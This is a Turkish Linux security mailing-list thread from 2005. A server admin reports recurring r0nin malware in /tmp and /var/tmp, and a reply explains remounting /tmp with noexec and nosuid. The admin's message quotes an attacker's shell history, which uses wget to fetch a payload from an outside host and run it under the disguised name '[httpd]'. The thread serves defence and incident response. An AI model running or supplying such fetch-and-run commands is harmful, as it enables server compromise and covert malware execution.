From: Huzeyfe ONAL (honal@ford.com.tr)
Date: Mon 18 Apr 2005 - 17:55:48 EEST
merhaba,
tmp dizininiz farkli bir partition olarak baglandi ise noexec
parametresi ile calistirilamaz olarak tekrar baglayabilirsiniz. Eger
farkli bir partitionda degilse kendiniz partition olusturarak noexec,
nosuid vs olarak baglayabilirsiniz. Bu tip bir yaklasimla sisteminiz
bircok gereksiz saldiriya alet olmaktan kurtulabilir. Farkli partitionda
olmayan /tmp icin yeniden olusturarak gerektigi sekilde baglamak icin
asagidaki adimlari uygulayabilirsiniz. (Sistemin yeniden baslatilmasi
gerekmiyor...)
200MB lik bos bir dosya olusturuluyor
#dd if=/dev/zero of=/dev/yenitmp bs=1024 count=200000
olusturulan bos dosya dosya sistemi haline getiriliyor. (Ext3)
#mke2fs -j /dev/yenitmp
istenirse suanki /tmp dizini farkli bir dizine yedek alinarak sonradan
olusturulacak tmp dizinine kopyalanabilir.
#cp -pr /tmp /home/huzeyfe/cop
Yeni olusturulan /tmp dizini noexec,nosuid olarak baglaniyor.
#mount -o loop,nosuid,noexec,rw /dev/yenitmp /tmp
#chmod 1777 /tmp
/etc/fstab dosyasina yazilarak sistemin yeniden baslayisinda ayarlarin
degismemesi saglanabilir.
/dev/yenitmp /tmp ext3 loop,noexec,nosuid,rw 0 0
...
..On Mon, 2005-04-18 at 13:50 +0300, The RED wrote:
> /var/tmp dizininde .bash_history oluşmuş. Sunucudaki exploit bir shell
> hesabı açıyor herhalde ve ev dizinini /var/tmp olarak veriyor. Normalde
> hiçbir kullanıcının shell izni yok. (sunucu web sunucu)
> /var/tmp/.bash_history dosyasının içeriği:
>
> e
> w
> /sbin/ifconfig
> w
> cd /var/tmp/.hu
> cd /var/tmp
> mkdir .hu
> cd .hu
> wget powerlock.home.ro/newpas.tgz
> wget powerlock.home.ro/newpass.tgz
> tar zxvf newpass.tgz
> mv newpass [httpd]
> export PATH="."
> [httpd]
>
>
> ----- Original Message -----
> From: "The RED" <jdred@gmx.net>
> To: <linux-sunucu@liste.linux.org.tr>
> Sent: Monday, April 18, 2005 1:43 PM
> Subject: Re: [Linux-sunucu] r0nin
>
>
> > Birileri sürekli /tmp ve /var/tmp dizinlerine r0nin vs. gibi dosyalar
> > yerleştirip çalıştırıyorlar. Az önce de "atac" isimli bri şey yüklenmiş ve
> > biraz önce bri atak yapıldı. 200-300 tane çalıştırılmış. ddos atağı
> > yapılıyor herhalde sunucu üzerinden. /var/tmp ve /tmp dizinlerindeki
> > dosyaların çalıştırılmasını nasıl önleyebilirim bilen yok mu?? Isletim
> > sistemi: Fedora core 1, kernel 2.4.22-1.2115.nptl,
>
> >
> > ----- Original Message -----
> > From: "The RED" <jdred@gmx.net>
> > To: <linux-sunucu@liste.linux.org.tr>
> > Sent: Monday, April 18, 2005 11:48 AM
> > Subject: [Linux-sunucu] r0nin
> >
> >
> >> merhaba. sunucuma bir süredir r0nin dadandi. daha önce temizlemistim
> >> yeniden
> >> /tmp/ dizini altina girmis. Daha önce de bu dizin altinda r0nin, brk gibi
> >> şeyler vardi silmistim ama bugün r0nin tekrar o dizinde.
> >> Internetten biraz arastirdim ama yeterli bilgiye rastlayamadim henüz.
> >> Nedir bu r0nin tam olarak? Apache ile ilgili bir açiktan bahsediliyor.
> >> Nasil
> >> bulasiyor? Etkileri (yol açabileceği şeyler) neler ve nasil tam olarak
> >> silinebiliyor? Bilen varsa lütfen yardimci olun.
> >>
> >>
> >
> >
> > --------------------------------------------------------------------------------
> >
> >
> > _______________________________________________
> > Linux-sunucu mailing list
> > Linux-sunucu@liste.linux.org.tr
> > http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
> >
> >
>
>
> --------------------------------------------------------------------------------
>
>
> _______________________________________________
> Linux-sunucu mailing list
> Linux-sunucu@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
>
> _______________________________________________
> Linux-guvenlik mailing list
> Linux-guvenlik@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik